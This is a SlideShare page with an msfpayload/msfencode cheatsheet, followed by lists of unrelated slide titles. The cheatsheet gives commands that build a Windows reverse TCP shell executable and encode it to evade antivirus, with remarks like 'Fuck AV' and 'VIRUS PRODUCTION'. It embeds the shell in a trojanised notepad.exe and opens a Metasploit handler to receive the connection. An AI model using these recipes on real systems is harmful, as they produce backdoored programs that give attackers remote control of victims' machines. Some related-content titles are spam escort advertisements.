SlideShare una empresa de Scribd logo

Msfpayload/Msfencoder cheatsheet

Descargar como TXT, PDF
Ce.Se.N.A. Security
Ce.Se.N.A. Security

a little list of useful msfpayload/msfencoder commands

Tecnología
1 de 3
========================================= A LITTLE MSFPAYLOAD/MSFENCODER CHEATSHEET ========================================= Last Modify: 08/12/2011 Author: luca.mella@studio.unibo.it ****************************************************************************** msfpayload -l List all payloads avaible msfpayload windows/shell/reverse_tcp S Print the summary of payload ------------------------------------------------------------------------ Name: Windows Command Shell, Reverse TCP Stager Module: payload/windows/shell/reverse_tcp Version: 10394, 11421 Platform: Windows Arch: x86 Needs Admin: No Total size: 290 Rank: Normal Provided by: spoonm <spoonm@no$email.com> sf <stephen_fewer@harmonysecurity.com> hdm <hdm@metasploit.com> skape <mmiller@hick.org> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to the attacker, Spawn a piped command shell (staged) ------------------------------------------------------------------------ msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 x > program.exe ****************************************************************************** msfencode OPTIONS: -a <opt> The architecture to encode as -b <opt> The list of characters to avoid: 'x00xff' !!! FTW !!! -c <opt> The number of times to encode the data !!! Fuck AV !!! -d <opt> Specify the directory in which to look for EXE templates -e <opt> The encoder to use -h Help banner
-i <opt> Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with -x) -l List available encoders -m <opt> Specifies an additional module search path -n Dump encoder information -o <opt> The output file -p <opt> The platform to encode for -s <opt> The maximum size of the encoded data -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop- vbs,asp,war -v Increase verbosity -x <opt> Specify an alternate executable template !!! VIRUS PRODUCTION !!! SUPPORTED ENCODERS: Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command generic/none normal The "none" Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
EXAMPLES: msfencode -e x86/alpha_mixed msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 R | msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe EXPLOIT SESSION HANDLER: msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=127.0.0.1 E

Recomendados

ARM 64bit has come!
ARM 64bit has come!ARM 64bit has come!
ARM 64bit has come!Tetsuyuki Kobayashi
 
Lecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationLecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationMohammed Farrag
 
Linux fundamental - Chap 00 shell
Linux fundamental - Chap 00 shellLinux fundamental - Chap 00 shell
Linux fundamental - Chap 00 shellKenny (netman)
 
bash
bashbash
bashGaurav Saxena
 
Driver Debugging Basics
Driver Debugging BasicsDriver Debugging Basics
Driver Debugging BasicsBala Subra
 
Bash 4
Bash 4Bash 4
Bash 4Pieter Colpaert
 
ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!Mr. Vengineer
 
Debug tutorial
Debug tutorialDebug tutorial
Debug tutorialDefri N
 

Recomendados

ARM 64bit has come!
ARM 64bit has come!ARM 64bit has come!
ARM 64bit has come!Tetsuyuki Kobayashi
 
Lecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationLecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationMohammed Farrag
 
Linux fundamental - Chap 00 shell
Linux fundamental - Chap 00 shellLinux fundamental - Chap 00 shell
Linux fundamental - Chap 00 shellKenny (netman)
 
bash
bashbash
bashGaurav Saxena
 
Driver Debugging Basics
Driver Debugging BasicsDriver Debugging Basics
Driver Debugging BasicsBala Subra
 
Bash 4
Bash 4Bash 4
Bash 4Pieter Colpaert
 
ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!ARM Trusted FirmwareのBL31を単体で使う!
ARM Trusted FirmwareのBL31を単体で使う!Mr. Vengineer
 
Debug tutorial
Debug tutorialDebug tutorial
Debug tutorialDefri N
 
Terminals and Shells
Terminals and ShellsTerminals and Shells
Terminals and ShellsHoffman Lab
 
Unit 1
Unit 1Unit 1
Unit 1siddr
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 
Unit 2
Unit 2Unit 2
Unit 2siddr
 
Adb instructions
Adb instructionsAdb instructions
Adb instructionsrklsaraswathi
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
First session quiz
First session quizFirst session quiz
First session quizKeroles karam khalil
 
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...Alexey Smirnov
 
Bare metal performance in Elixir
Bare metal performance in ElixirBare metal performance in Elixir
Bare metal performance in ElixirAaron Seigo
 
Examples -partII
Examples -partIIExamples -partII
Examples -partIIKedar Bhandari
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Linux fundamental - Chap 14 shell script
Linux fundamental - Chap 14 shell scriptLinux fundamental - Chap 14 shell script
Linux fundamental - Chap 14 shell scriptKenny (netman)
 
Radix 2 code
Radix 2 codeRadix 2 code
Radix 2 codepradipakv
 
Emu8086
Emu8086Emu8086
Emu8086rangarajb2005
 
Linux Commands - Cheat Sheet
Linux Commands - Cheat Sheet Linux Commands - Cheat Sheet
Linux Commands - Cheat Sheet Isham Rashik
 
Bash in theory and in practice - part two
Bash in theory and in practice - part twoBash in theory and in practice - part two
Bash in theory and in practice - part twoValerio Balbi
 
Sdl Basic
Sdl BasicSdl Basic
Sdl Basicroberto viola
 
Shellprogramming
ShellprogrammingShellprogramming
ShellprogrammingAndrew Vandever
 
Unix Shell Scripting Basics
Unix Shell Scripting BasicsUnix Shell Scripting Basics
Unix Shell Scripting BasicsDr.Ravi
 
Crimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCrimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCe.Se.N.A. Security
 
Opzet vu challenge
Opzet vu challengeOpzet vu challenge
Opzet vu challengeHielko van der Molen
 

Más contenido relacionado

La actualidad más candente

Terminals and Shells
Terminals and ShellsTerminals and Shells
Terminals and ShellsHoffman Lab
 
Unit 1
Unit 1Unit 1
Unit 1siddr
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 
Unit 2
Unit 2Unit 2
Unit 2siddr
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...Alexey Smirnov
 
Bare metal performance in Elixir
Bare metal performance in ElixirBare metal performance in Elixir
Bare metal performance in ElixirAaron Seigo
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Linux fundamental - Chap 14 shell script
Linux fundamental - Chap 14 shell scriptLinux fundamental - Chap 14 shell script
Linux fundamental - Chap 14 shell scriptKenny (netman)
 
Radix 2 code
Radix 2 codeRadix 2 code
Radix 2 codepradipakv
 
Linux Commands - Cheat Sheet
Linux Commands - Cheat Sheet Linux Commands - Cheat Sheet
Linux Commands - Cheat Sheet Isham Rashik
 
Bash in theory and in practice - part two
Bash in theory and in practice - part twoBash in theory and in practice - part two
Bash in theory and in practice - part twoValerio Balbi
 
Unix Shell Scripting Basics
Unix Shell Scripting BasicsUnix Shell Scripting Basics
Unix Shell Scripting BasicsDr.Ravi
 

La actualidad más candente (20)

Terminals and Shells
Terminals and ShellsTerminals and Shells
Terminals and Shells
 
Unit 1
Unit 1Unit 1
Unit 1
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
 
Unit 2
Unit 2Unit 2
Unit 2
 
Adb instructions
Adb instructionsAdb instructions
Adb instructions
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
First session quiz
First session quizFirst session quiz
First session quiz
 
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
FORECAST: Fast Generation of Accurate Context-Aware Signatures of Control-Hij...
 
Bare metal performance in Elixir
Bare metal performance in ElixirBare metal performance in Elixir
Bare metal performance in Elixir
 
Examples -partII
Examples -partIIExamples -partII
Examples -partII
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Linux fundamental - Chap 14 shell script
Linux fundamental - Chap 14 shell scriptLinux fundamental - Chap 14 shell script
Linux fundamental - Chap 14 shell script
 
Radix 2 code
Radix 2 codeRadix 2 code
Radix 2 code
 
Emu8086
Emu8086Emu8086
Emu8086
 
Linux Commands - Cheat Sheet
Linux Commands - Cheat Sheet Linux Commands - Cheat Sheet
Linux Commands - Cheat Sheet
 
Bash in theory and in practice - part two
Bash in theory and in practice - part twoBash in theory and in practice - part two
Bash in theory and in practice - part two
 
Sdl Basic
Sdl BasicSdl Basic
Sdl Basic
 
Shellprogramming
ShellprogrammingShellprogramming
Shellprogramming
 
Unix Shell Scripting Basics
Unix Shell Scripting BasicsUnix Shell Scripting Basics
Unix Shell Scripting Basics
 

Destacado

Crimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCrimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCe.Se.N.A. Security
 
Marketing wereld verandert, by Hielko
Marketing wereld verandert, by HielkoMarketing wereld verandert, by Hielko
Marketing wereld verandert, by HielkoHielko van der Molen
 
Letters Of Recommendation
Letters Of RecommendationLetters Of Recommendation
Letters Of Recommendationtlasaga
 
Résumé of Roy Decaestecker
Résumé of Roy DecaesteckerRésumé of Roy Decaestecker
Résumé of Roy Decaesteckerroydecaestecker
 
Nyenrode masterclass online marketing strategie & social media 2014
Nyenrode masterclass online marketing strategie & social media 2014 Nyenrode masterclass online marketing strategie & social media 2014
Nyenrode masterclass online marketing strategie & social media 2014 Hielko van der Molen
 

Destacado (10)

Crimini informatici e accesso abusivo
Crimini informatici e accesso abusivoCrimini informatici e accesso abusivo
Crimini informatici e accesso abusivo
 
Opzet vu challenge
Opzet vu challengeOpzet vu challenge
Opzet vu challenge
 
Anonymous email
Anonymous emailAnonymous email
Anonymous email
 
BLUETOOTH SECURITY - part1
BLUETOOTH SECURITY - part1BLUETOOTH SECURITY - part1
BLUETOOTH SECURITY - part1
 
Marketing wereld verandert, by Hielko
Marketing wereld verandert, by HielkoMarketing wereld verandert, by Hielko
Marketing wereld verandert, by Hielko
 
Letters Of Recommendation
Letters Of RecommendationLetters Of Recommendation
Letters Of Recommendation
 
Résumé of Roy Decaestecker
Résumé of Roy DecaesteckerRésumé of Roy Decaestecker
Résumé of Roy Decaestecker
 
Network monitoring tramite snmp
Network monitoring tramite snmpNetwork monitoring tramite snmp
Network monitoring tramite snmp
 
Nyenrode masterclass online marketing strategie & social media 2014
Nyenrode masterclass online marketing strategie & social media 2014 Nyenrode masterclass online marketing strategie & social media 2014
Nyenrode masterclass online marketing strategie & social media 2014
 
E-polis, wenselijk of niet?
E-polis, wenselijk of niet?E-polis, wenselijk of niet?
E-polis, wenselijk of niet?
 

Similar a Msfpayload/Msfencoder cheatsheet

Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet FiltersKernel TLV
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 
Specialized Compiler for Hash Cracking
Specialized Compiler for Hash CrackingSpecialized Compiler for Hash Cracking
Specialized Compiler for Hash CrackingPositive Hack Days
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]RootedCON
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerMarina Kolpakova
 
AllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW SecurityAllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW SecurityAllBits BVBA (freelancer)
 
Php opcodes sep2008
Php opcodes sep2008Php opcodes sep2008
Php opcodes sep2008bengiuliano
 
07 140430-ipp-languages used in llvm during compilation
07 140430-ipp-languages used in llvm during compilation07 140430-ipp-languages used in llvm during compilation
07 140430-ipp-languages used in llvm during compilationAdam Husár
 
Regular Expression (RegExp)
Regular Expression (RegExp)Regular Expression (RegExp)
Regular Expression (RegExp)Davide Dell'Erba
 
Introduction to debugging linux applications
Introduction to debugging linux applicationsIntroduction to debugging linux applications
Introduction to debugging linux applicationscommiebstrd
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debuggingHao-Ran Liu
 
Debugging Python with gdb
Debugging Python with gdbDebugging Python with gdb
Debugging Python with gdbRoman Podoliaka
 
Rtos ameba
Rtos amebaRtos ameba
Rtos amebaJou Neo
 
Introduction to ESP32 Programming [Road to RIoT 2017]
Introduction to ESP32 Programming [Road to RIoT 2017]Introduction to ESP32 Programming [Road to RIoT 2017]
Introduction to ESP32 Programming [Road to RIoT 2017]Alwin Arrasyid
 
C Programming Language Tutorial for beginners - JavaTpoint
C Programming Language Tutorial for beginners - JavaTpointC Programming Language Tutorial for beginners - JavaTpoint
C Programming Language Tutorial for beginners - JavaTpointJavaTpoint.Com
 

Similar a Msfpayload/Msfencoder cheatsheet (20)

Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet Filters
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Specialized Compiler for Hash Cracking
Specialized Compiler for Hash CrackingSpecialized Compiler for Hash Cracking
Specialized Compiler for Hash Cracking
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
 
AllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW SecurityAllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW Security
 
Php opcodes sep2008
Php opcodes sep2008Php opcodes sep2008
Php opcodes sep2008
 
07 140430-ipp-languages used in llvm during compilation
07 140430-ipp-languages used in llvm during compilation07 140430-ipp-languages used in llvm during compilation
07 140430-ipp-languages used in llvm during compilation
 
Regular Expression (RegExp)
Regular Expression (RegExp)Regular Expression (RegExp)
Regular Expression (RegExp)
 
Introduction to debugging linux applications
Introduction to debugging linux applicationsIntroduction to debugging linux applications
Introduction to debugging linux applications
 
Arm architecture
Arm architectureArm architecture
Arm architecture
 
Statyczna analiza kodu PHP
Statyczna analiza kodu PHPStatyczna analiza kodu PHP
Statyczna analiza kodu PHP
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debugging
 
Debugging Python with gdb
Debugging Python with gdbDebugging Python with gdb
Debugging Python with gdb
 
Rtos ameba
Rtos amebaRtos ameba
Rtos ameba
 
C programming session10
C programming session10C programming session10
C programming session10
 
Introduction to ESP32 Programming [Road to RIoT 2017]
Introduction to ESP32 Programming [Road to RIoT 2017]Introduction to ESP32 Programming [Road to RIoT 2017]
Introduction to ESP32 Programming [Road to RIoT 2017]
 
lec4.docx
lec4.docxlec4.docx
lec4.docx
 
Embedded C programming session10
Embedded C programming session10Embedded C programming session10
Embedded C programming session10
 
C Programming Language Tutorial for beginners - JavaTpoint
C Programming Language Tutorial for beginners - JavaTpointC Programming Language Tutorial for beginners - JavaTpoint
C Programming Language Tutorial for beginners - JavaTpoint
 

Más de Ce.Se.N.A. Security

Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route... Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...Ce.Se.N.A. Security
 
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...Ce.Se.N.A. Security
 
Analisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura modernaAnalisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura modernaCe.Se.N.A. Security
 
Monitoraggio di mac address in lan
Monitoraggio di mac address in lanMonitoraggio di mac address in lan
Monitoraggio di mac address in lanCe.Se.N.A. Security
 
Inoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linuxInoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linuxCe.Se.N.A. Security
 

Más de Ce.Se.N.A. Security (20)

Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route... Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per route...
 
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
Rilevamento di attacchi di rete tramite protocolli di monitoraggio per router...
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
 
ICTF overview
ICTF overviewICTF overview
ICTF overview
 
Hacking reti wireless
Hacking reti wirelessHacking reti wireless
Hacking reti wireless
 
SELinux - overview
SELinux - overviewSELinux - overview
SELinux - overview
 
Analisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura modernaAnalisi sulla sicurezza di una autovettura moderna
Analisi sulla sicurezza di una autovettura moderna
 
Sicurezza delle reti 802.11
Sicurezza delle reti 802.11Sicurezza delle reti 802.11
Sicurezza delle reti 802.11
 
Rilevamento intrusioni in wlan
Rilevamento intrusioni in wlanRilevamento intrusioni in wlan
Rilevamento intrusioni in wlan
 
Rainbow tables
Rainbow tablesRainbow tables
Rainbow tables
 
Monitoraggio di rete con nagios
Monitoraggio di rete con nagiosMonitoraggio di rete con nagios
Monitoraggio di rete con nagios
 
Monitoraggio di mac address in lan
Monitoraggio di mac address in lanMonitoraggio di mac address in lan
Monitoraggio di mac address in lan
 
Ip sec vulnerability
Ip sec vulnerabilityIp sec vulnerability
Ip sec vulnerability
 
Insider attack
Insider attackInsider attack
Insider attack
 
Inoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linuxInoltro di pacchetti ip in sistemi linux
Inoltro di pacchetti ip in sistemi linux
 
Iena
IenaIena
Iena
 
Clonare mac os x
Clonare mac os xClonare mac os x
Clonare mac os x
 
sicurezza e php
sicurezza e phpsicurezza e php
sicurezza e php
 
Sql injection - intro
Sql injection - introSql injection - intro
Sql injection - intro
 
IENA
IENAIENA
IENA
 

Último

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 

Último (20)

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
